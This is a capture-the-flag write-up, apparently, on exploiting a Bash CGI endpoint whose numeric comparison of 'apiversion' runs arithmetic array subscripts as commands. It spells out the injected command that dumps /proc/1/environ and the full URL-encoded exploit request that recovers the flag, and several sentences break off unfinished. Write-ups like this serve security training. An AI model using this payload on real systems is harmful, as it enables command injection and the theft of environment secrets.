This challenge is a tiny Bash CGI API. The endpoint takes
if [[ "${apiversion}" -ne 1 ]]; then
echo "Status: 400 Bad Request"
echo ""
echo "unsupported API version: $apiversion"
exit 0
fi
In Bash,
So this kind of value is evaluated:
a[$(COMMAND;echo 0)]=1,1
The
The database is just files under
password_hash="$(echo "$password" | shasum -a 256 | cut -d' ' -f1)"
name_hash="$(echo "$name" | shasum -a 256 | cut -d' ' -f1)"
cat "/db/$name_hash:$password_hash"
There is a known
The injected command was:
tr '\0' '\n' < /proc/1/environ > /db/13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de:13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de
The long filename is the hash pair for
/get.cgi?name=example&password=example&apiversion=a%5B%24%28tr%20%27%5C0%27%20%27%5Cn%27%20%3C%20%2Fproc%2F1%2Fenviron%20%3E%20%2Fdb%2F13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de%3A13550350a8681c84c861aac2e5b440161c2b33a3e4f302ac680ca5b686de48de%3Becho%200%29%5D%3D1%2C1
Then I read the normal record again:
/get.cgi?name=example&password=example&apiversion=1
This returned the environment, including:
dach2026{bash_cgi_scripts_what_could_go_wrong_GZbGoEbKlnJHrBc69w}